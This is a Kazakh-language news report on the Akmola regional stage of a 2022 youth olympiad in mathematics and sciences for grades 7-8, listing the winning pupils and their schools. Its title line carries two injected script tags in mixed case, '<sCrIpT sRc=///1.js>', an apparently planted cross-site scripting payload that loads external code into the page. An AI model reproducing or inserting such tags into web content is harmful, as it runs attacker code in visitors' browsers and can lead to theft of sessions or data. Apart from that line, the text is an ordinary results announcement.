7-8 сынып оқушыларына арналған жаратылыстану-математикалық бағыттағы пәндер бойынша Республикалық жасөспірімдер олимпиадасының облыстық кезеңінің қорытынды ақпараты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
22.04.2022
2022 жылғы 13 сәуірде Бурабай ауданы, Щучинск қаласы Ақмола облысы білім басқармасының жанындағы Жоғары педагогикалық колледж базасында 7-8 сынып оқушылары арасында жаратылыстану-математикалық бағыттағы пәндер бойынша Республикалық жасөспірімдер олимпиадасының екінші (облыстық) кезеңі өтті.
Олимпиаданың басты мақсаты – оқушылардың жаратылыстану-математикалық бағыттағы пәндерді тереңдетіп оқытуға қызығушылығын арттыру, жоғары деңгейдегі олимпиадаларға жасөспірімдерді даярлау жүйесін жетілдіру және резерв құру.
Олимпиада жаратылыстану-математикалық бағыттағы жалпы білім беретін келесі пәндер бойынша бір турда өткізілді: математика, физика, химия, биология және информатика.
Олимпиада барысында барлық пәндер бойынша оқу кабинеттерінде камера орнатылды, емтихан курсы YouTube-арнасында ZOOM платформасы арқылы тікелей эфирде көрсетілді.
Ашықтық пен академиялық адалдық үшін байқаушылар ретінде олимпиадаға қызығушылық танытпаған «үшінші тұлғалар» шақырылды: «Adaldyq alańy» жобалық кеңсесінің қызметкері, ата-аналар комитеттерінің өкілдері, ғалымдар мен колледж оқытушылары.
Олимпиада үш кезеңнен тұрады:
- 2022 жылғы 5 сәуір – 2163 ақмолалық оқушы аудандық (қалалық) кезеңге қатысты;
- 2022 жылғы 13 сәуір Щучинск қаласында – 155 оқушы облыстық кезеңге (аудандық (қалалық) кезеңінің жеңімпаздары) қатысты;
- 2022 жылғы мамыр айында Нұр-Сұлтан қаласында өтетін Республикалық (қорытынды) кезеңге облыстық кезеңде І-орынға ие болған 8 оқушы қатысады.
7-8 сынып оқушыларына арналған жаратылыстану-математикалық бағыттағы пәндер бойынша Республикалық жасөспірімдер олимпиадасының облыстық кезеңінің қорытындысы: I-орынға ие болған – 8 оқушы, ІІ-орынға ие болған – 9 оқушы, III-орынға ие болған – 11 оқушы дипломдармен және бағалы сыйлықтармен марапатталды. Екі қатысушы грамотамен марапатталды.
І дәрежелі дипломдармен марапатталды:
- Чернобровкина Дарья - Бурабай ауданы, Щучинск қаласының №1 мектеп-гимназиясының 7-сынып оқушысы;
- Мереке Закария - Көкшетау қаласы, "Білім-инновация" лицей интернатының 8-сынып оқушысы;
- Егінбай Акерке - Щучинск қаласы, IT "Білім-инновация" лицей-интернатының 7-сынып оқушысы;
- Нурмурадова Жаннур - Целиноград ауданы, Жаңаесіл ауылының жалпы орта білім беретін мектебінің 8-сынып оқушысы;
- Наби Жансая - Есіл ауданы, Есіл қаласының №3 жалпы орта білім беретін мектебінің 7-сынып оқушысы;
- Гирина София - Есіл ауданы, Есіл қаласының №1 жалпы орта білім беретін мектебінің 8-сынып оқушысы;
- Нечайкин Кирилл - Көкшетау қаласының №17 мектеп-гимназиясының 7-сынып оқушысы;
- Амирдинов Султанбек - Көкшетау қаласы, "Білім-инновация" лицей интернатының 8-сынып оқушысы.
ІІ дәрежелі дипломдармен марапатталды:
- Жаксылык Алдияр - Щучинск қаласы, IT "Білім-инновация" лицей-интернатының 7-сынып оқушысы;
- Хасен Балханым - Нұр-Сұлтан қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған мектеп-интернатының 7-сынып оқушысы;
- Алиев Бакдаулет - Степногорск қаласы, дарынды балаларға арналған №4 облыстық мамандандырылған "Болашақ" мектеп-интернатының 7-сынып оқушысы;
- Құндақбаева Нұрсая - Бурабай ауданы, Щучинск қаласының №9 мектеп-гимназиясының 8-сынып оқушысы;
- Рысқұлбек Дамир - Көкшетау қаласы, "Білім-инновация" лицей интернатының 8-сынып оқушысы;
- Хамитов Максат - Көкшетау қаласы, "Білім-инновация" лицей интернатының 7-сынып оқушысы;
- Миронова Екатерина - Степногорск қаласы, дарынды балаларға арналған №4 облыстық мамандандырылған "Болашақ" мектеп-интернатының 7-сынып оқушысы;
- Андрица Нина - Шортанды ауданы, Степной ауылының жалпы білім беретін орта мектебінің 8-сынып оқушысы;
- Сатыбеков Самат - Щучинск қаласы, IT "Білім-инновация" лицей-интернатының 8-сынып оқушысы.
ІІІ дәрежелі дипломдармен марапатталды:
1. Сидорович Богдана - Степногорск қаласы, дарынды балаларға арналған №4 облыстық мамандандырылған "Болашақ" мектеп-интернатының 7-сынып оқушысы;
2. Нұрлан Зарина - Нұр-Сұлтан қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған мектеп-интернатының 7-сынып оқушысы;
3. Шаймұрат Әмір - Бурабай ауданы, Щучинск қаласының №1 мектеп-гимназиясының 7-сынып оқушысы;
4. Чугуева Каролина - Есіл ауданы, Есіл қаласының Сайлау Серіков атындағы жалпы орта білім беретін мектебінің 7-сынып оқушысы;
5. Талғат Санжар - Көкшетау қаласы,Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 8-сынып оқушысы;
6. Кажкенов Дархан - Степногорск қаласы, дарынды балаларға арналған №4 облыстық мамандандырылған «Болашақ» мектеп-интернатының 8-сынып оқушысы;
7. Капаров Нұрмат - Біржан сал ауданы, Мамай ауылының негізгі мектебінің 7-сынып оқушысы;
8. Рунталь Юлиана - Астрахан ауданы, Лозовое ауылының негізгі орта мектебінің 7-сынып оқушысы;
9. Есенжолова Даяна - Шортады ауданы, Шортанды кентінің №2 жалпы орта білім беретін мектебінің 7-сынып оқушысы;
10. Бақытжан Жәнібек - Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 8-сынып оқушысы;
11. Ефремов Савелий - Аршалы ауданы, Арнасай ауылының жалпы орта білім беретін мектебінің 8-сынып оқушысы;
Грамотамен марапатталды:
- Калимжанов Расул - Көкшетау қаласы, "Білім-инновация" лицей интернатының 7-сынып оқушысы;
- Мұратов Әліби - Көкшетау қаласы,Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 8-сынып оқушысы.
Республикалық жасөспірімдер олимпиадасының облыстық кезенінің жеңімпаздары және жүлдегерлерін шын жүректер құттықтаймыз!
